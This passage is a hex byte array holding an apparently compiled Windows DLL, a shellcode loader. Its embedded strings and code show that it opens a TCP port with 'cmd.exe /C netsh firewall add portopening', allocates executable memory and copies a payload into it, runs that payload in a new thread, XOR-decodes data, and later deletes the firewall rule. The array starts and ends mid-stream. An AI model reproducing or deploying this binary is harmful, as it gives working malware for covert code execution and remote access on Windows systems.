0x00,0x10,0xe8,0x04,0xfd,0xff,0xff,0x89,0x45,0xfc,0x83,\r\n0x7d,0xfc,0x00,0x74,0x33,0x8b,0x4d,0xfc,0x51,0x68,0xfc,0x0d,0x00,0x10,0xe8,0xcf,\r\n0xf2,0xff,0xff,0x83,0xc4,0x08,0x8b,0x55,0xfc,0x52,0x68,0x28,0x0e,0x00,0x10,0x8b,\r\n0x45,0xf8,0x8b,0x48,0x0c,0x51,0xe8,0x85,0xee,0xff,0xff,0x0f,0xb6,0xd0,0x85,0xd2,\r\n0x75,0x04,0x32,0xc0,0xeb,0x15,0xeb,0x11,0x68,0x34,0x0e,0x00,0x10,0xe8,0xa0,0xf2,\r\n0xff,0xff,0x83,0xc4,0x04,0x32,0xc0,0xeb,0x02,0xb0,0x01,0x8b,0xe5,0x5d,0xc2,0x08,\r\n0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff,0xff,0x00,0x00,\r\n0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x00,0x00,0x00,\r\n0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68,\r\n0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f,\r\n0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20,\r\n0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x11,0xcb,0xaf,0x83,0x55,0xaa,0xc1,0xd0,0x55,0xaa,0xc1,0xd0,0x55,0xaa,0xc1,0xd0,\r\n0x72,0x6c,0xb
a,0xd0,0x52,0xaa,0xc1,0xd0,0x55,0xaa,0xc0,0xd0,0x4c,0xaa,0xc1,0xd0,\r\n0x5c,0xd2,0x45,0xd0,0x51,0xaa,0xc1,0xd0,0x5c,0xd2,0x53,0xd0,0x54,0xaa,0xc1,0xd0,\r\n0x5c,0xd2,0x50,0xd0,0x54,0xaa,0xc1,0xd0,0x52,0x69,0x63,0x68,0x55,0xaa,0xc1,0xd0,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x50,0x45,0x00,0x00,0x4c,0x01,0x04,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0xe0,0x00,0x02,0x21,0x0b,0x01,0x09,0x00,0x00,0x06,0x00,0x00,\r\n0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x12,0x00,0x00,0x00,0x10,0x00,0x00,\r\n0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,\r\n0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x50,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x40,0x05,\r\n0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x60,0x26,0x00,0x00,0x4e,0x00,0x00,0x00,\r\n0xd8,0x23,0x00,0x00,0x50,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x40,0x00,0x00,0xc8,0x00,0x00,0x00,0x70,0x20,0x00,0x00,0x1c,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x70,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00,\r\n0x76,0x05,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x04,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60,\r\n0x2e,0x72,0x64,0x61,0x74,0x61,0x00,0x00,0x11,0x07,0x00,0x00,0x00,0x20,0x00,0x00,\r\n0x00,0x08,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
r\n0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2e,0x64,0x61,0x74,0x61,0x00,0x00,0x00,\r\n0x2b,0x01,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x12,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xc0,\r\n0x2e,0x72,0x65,0x6c,0x6f,0x63,0x00,0x00,0xde,0x00,0x00,0x00,0x00,0x40,0x00,0x00,\r\n0x00,0x02,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0xff,0x54,0x24,0x04,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x81,0xec,0x1c,0x01,0x00,0x00,0x56,0x57,0xc7,0x85,0xe8,0xfe,0xff,\r\n0xff,0x00,0x00,0x00,0x00,0xff,0x15,0x24,0x20,0x00,0x10,0x50,0xff,0x15,0x20,0x20,\r\n0x00,0x10,0x50,0x68,0x8c,0x20,0x00,0x10,0x6a,0x16,0x68,0xb0,0x20,0x00,0x10,0xe8,\r\n0x7c,0x03,0x00,0x00,0x83,0xc4,0x14,0x68,0x5c,0x11,0x00,0x00,0x68,0xc0,0x20,0x00,\r\n0x10,0x6a,0x1a,0x68,0xf8,0x20,0x00,0x10,0xe8,0x63,0x03,0x00,0x00,0x83,0xc4,0x10,\r\n0x68,0x5c,0x11,0x00,0x00,0x68,0x08,0x21,0x00,0x10,0x8d,0x85,0xf0,0xfe,0xff,0xff,\r\n0x50,0xff,0x15,0x64,0x20,0x00,0x10,0x83,0xc4,0x0c,0x6a,0x00,0x8d,0x8d,0xf0,0xfe,\r\n0xff,0xff,0x51,0xff,0x15,0x1c,0x20,0x00,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,0x8b,\r\n0x95,0xec,0xfe,0xff,0xff,0x52,0x68,0x40,0x21,0x00,0x10,0x6a,0x21,0x68,0x64,0x21,\r\n0x00,0x10,0xe8,0x19,0x03,0x00,0x00,0x83,0xc4,0x10,0x6a,0x40,0x68,0x00,0x30,0x00,\r\n0x00,0x68,0x2b,0x01,0x00,0x00,0x6a,0x00,0xff,0x15,0x18,0x20,0x00,0x10,0x89,0x45,\r\n0xfc,0x83,0x7d,0xfc,0x00,0x0f,0x84,0xa1,0x00,0x00,0x00,0x8b,0x45,0xfc,0x50,0x68,\r\n0x2b,0x01,0x00,0x00,0x68,0x74,0x21,0x00,0x10,0x6a,0x28,0x68,0xac,0x21,0x00,0x10,\r\n0xe8,0xdb,0x02,0x00,0x00,0x83,0xc4,0x14,0xb9,0x4a,0x00,0x00,0x00,0xbe,0x00,0x30,\r\n0x00,0x10,0x8b,0x7d,0xfc,0xf3,0xa5,0x66,0xa5,0xa4,0x6a,0x00,0x6a,0x00,0x8b,0x4d,\r\n0xfc,0x51,0x68,0x00,0x10,0x00,0x10,0x6a,0x00,0x6a
,0x00,0xff,0x15,0x14,0x20,0x00,\r\n0x10,0x89,0x85,0xe4,0xfe,0xff,0xff,0x83,0xbd,0xe4,0xfe,0xff,0xff,0x00,0x74,0x1e,\r\n0x6a,0xff,0x8b,0x95,0xe4,0xfe,0xff,0xff,0x52,0xff,0x15,0x10,0x20,0x00,0x10,0x8b,\r\n0x85,0xe4,0xfe,0xff,0xff,0x50,0xff,0x15,0x0c,0x20,0x00,0x10,0xeb,0x1b,0xff,0x15,\r\n0x08,0x20,0x00,0x10,0x50,0x68,0xbc,0x21,0x00,0x10,0x6a,0x38,0x68,0xd8,0x21,0x00,\r\n0x10,0xe8,0x6a,0x02,0x00,0x00,0x83,0xc4,0x10,0x68,0x00,0x80,0x00,0x00,0x6a,0x00,\r\n0x8b,0x4d,0xfc,0x51,0xff,0x15,0x30,0x20,0x00,0x10,0xeb,0x1b,0xff,0x15,0x08,0x20,\r\n0x00,0x10,0x50,0x68,0xe8,0x21,0x00,0x10,0x6a,0x3f,0x68,0x04,0x22,0x00,0x10,0xe8,\r\n0x3c,0x02,0x00,0x00,0x83,0xc4,0x10,0x68,0x14,0x22,0x00,0x10,0x6a,0x43,0x68,0x40,\r\n0x22,0x00,0x10,0xe8,0x28,0x02,0x00,0x00,0x83,0xc4,0x0c,0x6a,0x00,0x68,0x50,0x22,\r\n0x00,0x10,0xff,0x15,0x1c,0x20,0x00,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,0x8b,0x95,\r\n0xec,0xfe,0xff,0xff,0x52,0x68,0x90,0x22,0x00,0x10,0x6a,0x45,0x68,0xb4,0x22,0x00,\r\n0x10,0xe8,0xfa,0x01,0x00,0x00,0x83,0xc4,0x10,0x68,0xc4,0x22,0x00,0x10,0x6a,0x47,\r\n0x68,0xd8,0x22,0x00,0x10,0xe8,0xe6,0x01,0x00,0x00,0x83,0xc4,0x0c,0xff,0xb5,0xe8,\r\n0xfe,0xff,0xff,0x68,0x00,0x80,0x00,0x00,0x6a,0x00,0xff,0x75,0x08,0xff,0x35,0x5c,\r\n0x20,0x00,0x10,0xa1,0x30,0x20,0x00,0x10,0xff,0xe0,0x8b,0x85,0xe8,0xfe,0xff,0xff,\r\n0x5f,0x5e,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x56,0x8b,0x74,0x24,0x08,0x57,0x8b,0x7c,0x24,0x14,0x33,0xc0,0x85,0xff,0x76,0x08,\r\n0x88,0x04,0x30,0x40,0x3b,0xc7,0x72,0xf8,0x33,0xc0,0x85,0xff,0x76,0x13,0x8a,0x4c,\r\n0x24,0x10,0x8a,0x14,0x30,0x32,0xd0,0x02,0xd1,0x88,0x14,0x30,0x40,0x3b,0xc7,0x72,\r\n0xf1,0x5f,0x5e,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x8b,0x44,0x24,0x08,0x81,0xec,0x10,0x02,0x00,0x00,0x83,0xe8,0x01,0x0f,0x85,0xe4,\r\n0x00,0x00,0x00,0x56,0x57,0x68,0x04,0x01,0x00,0x00,0x8d,0x84,0x24,0x18,0x01,0x00,\r\n0x00,0x50,0x6a,0x00,0xc7,0x44,0x24,0x18,0x04,0x01,0x00,0x00,0xff,0x15,0x58,0x20,\r\n0x00,0x10,0x50,0xff,0x15,0x2c,0x2
0,0x00,0x10,0x8d,0x4c,0x24,0x0c,0x51,0x8d,0x54,\r\n0x24,0x14,0x52,0xff,0x15,0x00,0x20,0x00,0x10,0x8d,0x44,0x24,0x10,0x50,0xff,0x15,\r\n0x20,0x20,0x00,0x10,0x50,0x8d,0x8c,0x24,0x1c,0x01,0x00,0x00,0x51,0x68,0xe8,0x22,\r\n0x00,0x10,0x6a,0x7e,0x68,0x28,0x23,0x00,0x10,0xe8,0x02,0x01,0x00,0x00,0x8b,0xbc,\r\n0x24,0x34,0x02,0x00,0x00,0x8b,0x77,0x3c,0x83,0xc4,0x18,0x8d,0x54,0x24,0x08,0x52,\r\n0x03,0xf7,0xc7,0x44,0x24,0x0c,0x00,0x00,0x00,0x00,0x8b,0x46,0x54,0x6a,0x04,0x50,\r\n0x57,0xff,0x15,0x28,0x20,0x00,0x10,0x85,0xc0,0x74,0x0f,0x8b,0x4e,0x54,0x51,0x6a,\r\n0x00,0x57,0xe8,0x19,0xff,0xff,0xff,0x83,0xc4,0x0c,0x6a,0x00,0x6a,0x00,0x57,0x68,\r\n0x10,0x10,0x00,0x10,0x6a,0x00,0x6a,0x00,0xff,0x15,0x14,0x20,0x00,0x10,0x5f,0x5e,\r\n0x85,0xc0,0x74,0x15,0x50,0xff,0x15,0x0c,0x20,0x00,0x10,0xb8,0x01,0x00,0x00,0x00,\r\n0x81,0xc4,0x10,0x02,0x00,0x00,0xc2,0x0c,0x00,0xff,0x15,0x08,0x20,0x00,0x10,0x50,\r\n0x68,0x38,0x23,0x00,0x10,0x68,0x94,0x00,0x00,0x00,0x68,0x54,0x23,0x00,0x10,0xe8,\r\n0x7c,0x00,0x00,0x00,0x83,0xc4,0x10,0xb8,0x01,0x00,0x00,0x00,0x81,0xc4,0x10,0x02,\r\n0x00,0x00,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x6a,0x40,0x68,0x64,0x23,0x00,0x10,0x68,0x6c,0x23,0x00,0x10,0x6a,0x00,0xff,0x15,\r\n0x68,0x20,0x00,0x10,0x6a,0x00,0xff,0x15,0x34,0x20,0x00,0x10,0xcc,0xcc,0xcc,0xcc,\r\n0x53,0x8b,0x1d,0x38,0x20,0x00,0x10,0x55,0x56,0x57,0x8b,0x7c,0x24,0x14,0x57,0x8b,\r\n0xef,0x33,0xf6,0xff,0xd3,0x85,0xc0,0x7e,0x1e,0x8d,0xa4,0x24,0x00,0x00,0x00,0x00,\r\n0x8a,0x04,0x3e,0x3c,0x5c,0x74,0x04,0x3c,0x2f,0x75,0x04,0x8d,0x6c,0x3e,0x01,0x57,\r\n0x46,0xff,0xd3,0x3b,0xf0,0x7c,0xe9,0x5f,0x5e,0x8b,0xc5,0x5d,0x5b,0xc3,0xcc,0xcc,\r\n0x51,0x56,0x8b,0x35,0x54,0x20,0x00,0x10,0x57,0x68,0x7c,0x23,0x00,0x10,0x68,0x84,\r\n0x23,0x00,0x10,0xff,0xd6,0x8b,0x3d,0x50,0x20,0x00,0x10,0x50,0xff,0xd7,0x89,0x44,\r\n0x24,0x08,0x85,0xc0,0x0f,0x84,0xf1,0x00,0x00,0x00,0x55,0x68,0x90,0x23,0x00,0x10,\r\n0x68,0x9c,0x23,0x00,0x10,0xff,0xd6,0x50,0xff,0xd7,0x8b,0xe8,0x85,0xed,0x0f,0x84,\r\n0xd6,0x00,0x00,0x
00,0x68,0xa8,0x23,0x00,0x10,0x68,0xb4,0x23,0x00,0x10,0xff,0xd6,\r\n0x50,0xff,0xd7,0x85,0xc0,0x0f,0x84,0xbf,0x00,0x00,0x00,0x8b,0x54,0x24,0x1c,0x53,\r\n0x8d,0x4c,0x24,0x24,0x51,0x52,0xff,0xd0,0x8b,0x1d,0x4c,0x20,0x00,0x10,0x8b,0xf8,\r\n0x83,0xc4,0x08,0x81,0xc7,0x00,0x01,0x00,0x00,0x57,0x6a,0x00,0xff,0xd3,0x8b,0xf0,\r\n0x85,0xf6,0x0f,0x84,0x91,0x00,0x00,0x00,0x57,0x6a,0x00,0xff,0xd3,0x8b,0xf8,0x85,\r\n0xff,0x75,0x0d,0x56,0xff,0x15,0x48,0x20,0x00,0x10,0x5b,0x5d,0x5f,0x5e,0x59,0xc3,\r\n0x8b,0x4c,0x24,0x20,0x8d,0x44,0x24,0x24,0x50,0x51,0x56,0xff,0xd5,0x8b,0x54,0x24,\r\n0x28,0x8b,0x44,0x24,0x24,0x83,0xc4,0x0c,0x56,0x52,0x50,0xe8,0x00,0xff,0xff,0xff,\r\n0x83,0xc4,0x04,0x50,0xff,0x15,0x20,0x20,0x00,0x10,0x50,0x68,0xc0,0x23,0x00,0x10,\r\n0x57,0xff,0x54,0x24,0x28,0x83,0xc4,0x18,0x57,0xff,0x15,0x44,0x20,0x00,0x10,0x6a,\r\n0xf5,0xff,0x15,0x40,0x20,0x00,0x10,0x8b,0xd8,0x83,0xfb,0xff,0x74,0x1f,0x6a,0x00,\r\n0x8d,0x4c,0x24,0x14,0x51,0x56,0xc7,0x44,0x24,0x1c,0x00,0x00,0x00,0x00,0xff,0x15,\r\n0x38,0x20,0x00,0x10,0x50,0x56,0x53,0xff,0x15,0x3c,0x20,0x00,0x10,0x57,0x8b,0x3d,\r\n0x48,0x20,0x00,0x10,0xff,0xd7,0x56,0xff,0xd7,0x5b,0x5d,0x5f,0x5e,0x59,0xc3,0xcc,\r\n0xff,0x25,0x5c,0x20,0x00,0x10,0xff,0x25,0x30,0x20,0x00,0x10,0xff,0x25,0x08,0x20,\r\n0x00,0x10,0xff,0x25,0x0c,0x20,0x00,0x10,0xff,0x25,0x10,0x20,0x00,0x10,0xff,0x25,\r\n0x14,0x20,0x00,0x10,0xff,0x25,0x18,0x20,0x00,0x10,0xff,0x25,0x1c,0x20,0x00,0x10,\r\n0xff,0x25,0x20,0x20,0x00,0x10,0xff,0x25,0x24,0x20,0x00,0x10,0xff,0x25,0x28,0x20,\r\n0x00,0x10,0xff,0x25,0x2c,0x20,0x00,0x10,0xff,0x25,0x58,0x20,0x00,0x10,0xff,0x25,\r\n0x34,0x20,0x00,0x10,0xff,0x25,0x38,0x20,0x00,0x10,0xff,0x25,0x3c,0x20,0x00,0x10,\r\n0xff,0x25,0x40,0x20,0x00,0x10,0xff,0x25,0x44,0x20,0x00,0x10,0xff,0x25,0x48,0x20,\r\n0x00,0x10,0xff,0x25,0x4c,0x20,0x00,0x10,0xff,0x25,0x50,0x20,0x00,0x10,0xff,0x25,\r\n0x54,0x20,0x00,0x10,0xff,0x25,0x64,0x20,0x00,0x10,0xff,0x25,0x68,0x20,0x00,0x10,\r\n0xff,0x25,0x00,0x20,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0
x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x36,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0xb4,0x24,0x00,0x00,0xc4,0x24,0x00,0x00,\r\n0xd2,0x24,0x00,0x00,0xe8,0x24,0x00,0x00,0xf8,0x24,0x00,0x00,0x08,0x25,0x00,0x00,\r\n0x12,0x25,0x00,0x00,0x28,0x25,0x00,0x00,0x3e,0x25,0x00,0x00,0x50,0x25,0x00,0x00,\r\n0xa6,0x24,0x00,0x00,0x7a,0x25,0x00,0x00,0x88,0x25,0x00,0x00,0x94,0x25,0x00,0x00,\r\n0xa0,0x25,0x00,0x00,0xb0,0x25,0x00,0x00,0xc6,0x25,0x00,0x00,0xd2,0x25,0x00,0x00,\r\n0xe0,0x25,0x00,0x00,0xf2,0x25,0x00,0x00,0x66,0x25,0x00,0x00,0x98,0x24,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x10,0x26,0x00,0x00,0x1c,0x26,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,\r\n0x61,0x00,0x00,0x00,0xb0,0x26,0x00,0x00,0xb0,0x10,0x00,0x00,0x4d,0x61,0x69,0x6e,\r\n0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x54,0x68,0x72,0x65,0x61,0x64,\r\n0x20,0x25,0x78,0x3a,0x25,0x78,0x20,0x73,0x74,0x61,0x72,0x74,0x65,0x64,0x0a,0x00,\r\n0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,\r\n0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x41,0x64,\r\n0x64,0x69,0x6e,0x67,0x20,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,0x6c,0x20,0x72,0x75,\r\n0x6c,0x65,0x20,0x66,0x6f,0x72,0x20,0x54,0x43,0x50,0x20,0x70,0x6f,0x72,0x74,0x20,\r\n0x25,0x64,0x2e,0x2e,0x2e,0x0a,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d
,0x61,0x69,\r\n0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x63,0x6d,0x64,0x2e,0x65,0x78,0x65,0x20,\r\n0x2f,0x43,0x20,0x6e,0x65,0x74,0x73,0x68,0x20,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,\r\n0x6c,0x20,0x61,0x64,0x64,0x20,0x70,0x6f,0x72,0x74,0x6f,0x70,0x65,0x6e,0x69,0x6e,\r\n0x67,0x20,0x54,0x43,0x50,0x20,0x25,0x64,0x20,0x53,0x79,0x73,0x74,0x65,0x6d,0x00,\r\n0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x44,0x6f,\r\n0x6e,0x65,0x20,0x28,0x65,0x78,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,0x3a,0x20,0x25,\r\n0x64,0x29,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,\r\n0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,\r\n0x3a,0x20,0x41,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x64,0x20,0x25,0x64,0x20,0x62,\r\n0x79,0x74,0x65,0x73,0x20,0x66,0x6f,0x72,0x20,0x70,0x61,0x79,0x6c,0x6f,0x61,0x64,\r\n0x20,0x61,0x74,0x20,0x30,0x78,0x25,0x78,0x0a,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,\r\n0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x43,0x72,0x65,0x61,\r\n0x74,0x65,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,\r\n0x20,0x25,0x64,0x0a,0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,\r\n0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x41,\r\n0x6c,0x6c,0x6f,0x63,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x20,0x25,0x64,0x0a,\r\n0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,\r\n0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,\r\n0x3a,0x20,0x44,0x65,0x6c,0x65,0x74,0x69,0x6e,0x67,0x20,0x66,0x69,0x72,0x65,0x77,\r\n0x61,0x6c,0x6c,0x20,0x72,0x75,0x6c,0x65,0x2e,0x2e,0x2e,0x0a,0x00,0x00,0x00,0x00,\r\n0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,\r\n0x63,0x6d,0x64,0x2e,0x65,0x78,0x65,0x20,0x2f,0x43,0x20,0x6e,0x65,0x74,0x73,0x68,\r\n0x20,0x61,0x64,0x76,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,0x6c,0x20,0x66,0x69,0x72,\r\n0x65,0x77,0x61,0x6c,0x6c,0x20,0x64,0x65,0x6c,0x65,0x7
